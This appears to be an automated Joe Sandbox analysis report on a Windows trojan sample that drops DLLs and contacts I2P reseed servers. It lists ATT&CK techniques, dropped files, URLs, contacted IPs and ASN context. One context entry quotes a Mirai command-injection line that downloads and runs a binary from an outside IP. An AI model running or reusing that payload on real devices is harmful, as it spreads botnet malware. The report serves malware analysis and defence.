Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	121 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Access Token Manipulation	/etc/passwd and /etc/shadow	21 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Virtualization/Sandbox Evasion	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	1 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Users	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Services File Permissions Weakness	GUI Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	100%	Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	19%	ReversingLabs	Win64.Trojan.Barys
C:\Windows\Temp\9qaNW6z6	0%	ReversingLabs
C:\Windows\Temp\DYoNFfUY	0%	ReversingLabs
C:\Windows\Temp\HwfABz7s	0%	ReversingLabs
C:\Windows\Temp\Jcf8nu5c	0%	ReversingLabs
C:\Windows\Temp\TLN3Eh0f	0%	ReversingLabs
C:\Windows\Temp\j8fz8FfX	0%	ReversingLabs
C:\Windows\Temp\kInii6kX	0%	ReversingLabs
C:\Windows\Temp\zCUeqzwC	0%	ReversingLabs
C:\Windows\Temp\zFE1sfMY	0%	ReversingLabs

Source	Detection	Scanner	Label
https://i2p.ghativega.in/	0%	Avira URL Cloud	safe
https://i2pseed.creativecowpat.net:8443/	0%	Avira URL Cloud	safe
https://i2p.novg.net/	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txt2	0%	Avira URL Cloud	safe
https://netdb.i2p2.no/	0%	Avira URL Cloud	safe
https://reseed-fr.i2pd.xyz/	0%	Avira URL Cloud	safe
https://reseed.i2p-projekt.de/	0%	Avira URL Cloud	safe
https://reseed.memcpy.io/	0%	Avira URL Cloud	safe
https://reseed.i2pgit.org/	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	0%	Avira URL Cloud	safe
http://127.0.0.1:8118	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txt	0%	Avira URL Cloud	safe
http://stats.i2p/cgi-bin/newhosts.txt	0%	Avira URL Cloud	safe
https://reseed-pl.i2pd.xyz/	0%	Avira URL Cloud	safe
https://reseed.diva.exchange/	0%	Avira URL Cloud	safe
https://www2.mk16.de/	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txt/	0%	Avira URL Cloud	safe
http://identiguy.i2p/hosts.txt	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txtp_lib.c	0%	Avira URL Cloud	safe
https://i2p.mooo.com/netDb/	0%	Avira URL Cloud	safe
http://reg.i2p/hosts.txtR	0%	Avira URL Cloud	safe
https://legit-website.com/i2pseeds.su3	0%	Avira URL Cloud	safe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	0%	Avira URL Cloud	safe
https://reseed.onion.im/	0%	Avira URL Cloud	safe
https://reseed.stormycloud.org/	0%	Avira URL Cloud	safe
https://reseed2.i2p.net/	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	0%	Avira URL Cloud	safe
http://rus.i2p/hosts.txt	0%	Avira URL Cloud	safe
https://banana.incognet.io/	0%	Avira URL Cloud	safe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://reseed-fr.i2pd.xyz/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
https://i2pseed.creativecowpat.net:8443/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
https://reseed.i2p-projekt.de/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
https://i2p.novg.net/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txt2	main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://netdb.i2p2.no/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
https://reseed.memcpy.io/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
https://i2p.ghativega.in/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.i2pgit.org/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
https://www2.mk16.de/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txt	main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.dr	false	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3	main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txt/	main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed-pl.i2pd.xyz/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://stats.i2p/cgi-bin/newhosts.txt	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:8118	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
http://identiguy.i2p/hosts.txt	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
https://reseed.diva.exchange/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txtp_lib.c	main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://legit-website.com/i2pseeds.su3	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
https://reseed.onion.im/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
https://i2p.mooo.com/netDb/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txtR	main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
https://reseed2.i2p.net/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://banana.incognet.io/	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.dr	true	Avira URL Cloud: safe	unknown
http://rus.i2p/hosts.txt	dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr	false	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
70.113.162.253	unknown	United States	11427	TWC-11427-TEXASUS	true
184.65.173.183	unknown	Canada	6327	SHAWCA	false
68.1.55.11	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
5.19.249.240	unknown	Russian Federation	41733	ZTELECOM-ASRU	false
89.89.209.95	unknown	France	5410	BOUYGTEL-ISPFR	false
213.145.125.139	unknown	Bulgaria	9070	COOOLBOXBG	false
188.174.130.9	unknown	Germany	8767	MNET-ASGermanyDE	false
154.61.58.162	unknown	United States	203749	HN-ASGB	false
5.104.75.170	unknown	Russian Federation	197328	INETLTDTR	false
88.210.6.42	unknown	Russian Federation	25308	CITYLAN-ASRU	true
107.189.6.31	unknown	United States	53667	PONYNETUS	false
135.181.40.188	unknown	Germany	24940	HETZNER-ASDE	false
46.51.90.183	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
81.183.201.129	unknown	Hungary	5483	MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU	false
161.65.240.191	unknown	New Zealand	9790	VOCUSGROUPNZVocusGroupNZ	false
85.6.171.9	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
68.65.178.44	unknown	United States	46449	ASTREA-NORTHWI-WESTUPMIUS	false
47.250.187.161	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
198.37.222.72	unknown	United States	10796	TWC-10796-MIDWESTUS	false
85.239.53.47	unknown	Russian Federation	134121	RAINBOW-HKRainbownetworklimitedHK	false
74.222.100.29	unknown	United States	20257	FTC-INETUS	false
188.187.151.89	unknown	Russian Federation	41786	ERTH-YOLA-ASRU	false
24.70.217.209	unknown	Canada	6327	SHAWCA	false
86.46.70.248	unknown	Ireland	5466	EIRCOMInternetHouseIE	false
31.13.134.204	unknown	Russian Federation	197765	ITPARK_DCRU	false
24.231.176.11	unknown	United States	20115	CHARTER-20115US	false
101.191.73.121	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
190.22.24.78	unknown	Chile	7418	TELEFONICACHILESACL	false
24.51.216.45	unknown	United States	30404	BSCL-11US	false
78.47.80.55	unknown	Germany	24940	HETZNER-ASDE	false
88.156.92.211	unknown	Poland	29314	VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPL	false
99.234.18.44	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
86.106.93.104	unknown	Belize	44901	BELCLOUDBG	false
85.239.63.250	unknown	Russian Federation	134121	RAINBOW-HKRainbownetworklimitedHK	false
85.239.52.241	unknown	Russian Federation	134121	RAINBOW-HKRainbownetworklimitedHK	true
188.89.23.222	unknown	Netherlands	31615	TMO-NL-ASNL	false
194.207.132.221	unknown	United Kingdom	12390	KINGSTON-UK-ASGB	false
85.230.189.73	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
207.178.119.175	unknown	United States	35851	BANKERSBANKOFKANSASUS	false
212.118.52.164	unknown	Russian Federation	56806	ASCOM4SRU	false
92.95.33.134	unknown	France	15557	LDCOMNETFR	false
217.10.112.72	unknown	Sweden	35706	NAOSE	false
66.228.49.30	unknown	United States	63949	LINODE-APLinodeLLCUS	false
73.246.172.43	unknown	United States	7922	COMCAST-7922US	false
64.95.13.143	unknown	United States	31982	BRAHMAN-NYUS	false
176.109.240.152	unknown	Russian Federation	41709	LDS-UA	false
141.98.234.85	unknown	Russian Federation	41011	CH-NET-ASRO	true
45.76.244.95	unknown	United States	20473	AS-CHOOPAUS	false
99.252.228.84	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
2.135.133.55	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
139.162.110.14	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	false
2.177.52.177	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
185.128.245.162	unknown	Austria	51184	FONIRAAT	false
66.78.40.49	unknown	United States	46261	QUICKPACKETUS	false
108.227.133.164	unknown	United States	7018	ATT-INTERNET4US	false
89.219.212.160	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
106.68.22.241	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1516963
Start date and time:	2024-09-24 17:45:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@38/136@0/58
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target dx4w727xyq6q2yaxja.exe, PID 3744 because it is empty
Execution Graph export aborted for target file.exe, PID 6688 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:46:07	API Interceptor	216x Sleep call for process: file.exe modified
11:46:14	API Interceptor	50x Sleep call for process: powershell.exe modified
11:47:01	API Interceptor	711165x Sleep call for process: main.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
99.234.18.44	skyljne.mpsl.elf	Get hash	malicious	Mirai	Browse	/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}mips;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SHAWCA	SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elf	Get hash	malicious	Unknown	Browse	50.72.73.81
	SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elf	Get hash	malicious	Unknown	Browse	24.82.111.181
	ZgBCG135hk.elf	Get hash	malicious	Mirai, Moobot	Browse	24.69.3.95
	mdfh8nJQAy.elf	Get hash	malicious	Mirai, Moobot	Browse	96.52.28.136
	yMg23n1D5d.elf	Get hash	malicious	Mirai, Moobot	Browse	184.65.83.254
	XPK8NKw7Jv.elf	Get hash	malicious	Mirai, Moobot	Browse	24.70.74.89
	O9M84hUenb.elf	Get hash	malicious	Mirai, Okiru	Browse	50.70.203.45
	jydeTkHxMv.elf	Get hash	malicious	Unknown	Browse	68.148.70.154
	SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elf	Get hash	malicious	Mirai	Browse	142.230.62.174
	SecuriteInfo.com.Linux.Siggen.9999.15962.9862.elf	Get hash	malicious	Mirai	Browse	70.78.77.137
TWC-11427-TEXASUS	SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elf	Get hash	malicious	Unknown	Browse	72.191.2.31
	cQOoKCZyG3.elf	Get hash	malicious	Mirai	Browse	70.117.108.32
	SecuriteInfo.com.Linux.Siggen.9999.21080.24829.elf	Get hash	malicious	Mirai	Browse	70.120.70.106
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	76.187.110.110
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	67.48.82.53
	95.214.27.183-x86-2024-09-02T08_52_28.elf	Get hash	malicious	Unknown	Browse	66.68.51.160
	94.156.71.153-sparc-2024-08-29T17_31_55.elf	Get hash	malicious	Unknown	Browse	70.121.73.31
	154.213.187.80-mips-2024-08-30T23_29_44.elf	Get hash	malicious	Mirai	Browse	66.69.104.43
	mirai.m68k.elf	Get hash	malicious	Mirai	Browse	75.81.132.111
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	70.115.6.43
ASN-CXA-ALL-CCI-22773-RDCUS	SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elf	Get hash	malicious	Unknown	Browse	70.186.61.160
	SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elf	Get hash	malicious	Unknown	Browse	98.187.110.147
	SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elf	Get hash	malicious	Unknown	Browse	184.181.236.224
	jade.spc.elf	Get hash	malicious	Mirai	Browse	68.15.246.82
	Tsunami.arm.elf	Get hash	malicious	Mirai	Browse	98.160.221.195
	mdfh8nJQAy.elf	Get hash	malicious	Mirai, Moobot	Browse	70.179.119.239
	yMg23n1D5d.elf	Get hash	malicious	Mirai, Moobot	Browse	164.170.79.96
	XPK8NKw7Jv.elf	Get hash	malicious	Mirai, Moobot	Browse	98.187.245.127
	nIl2wyif6Q.elf	Get hash	malicious	Unknown	Browse	68.8.161.89
	jNGMZWmt23.elf	Get hash	malicious	Mirai	Browse	184.178.218.247

Process:	C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	3.2341395630162877
Encrypted:	false
SSDEEP:	12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
MD5:	40AB00517F4227F2C3C334F1D16B65B4
SHA1:	F8D57AF017E2209B4FB24122647FD7F71B67C87C
SHA-256:	4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
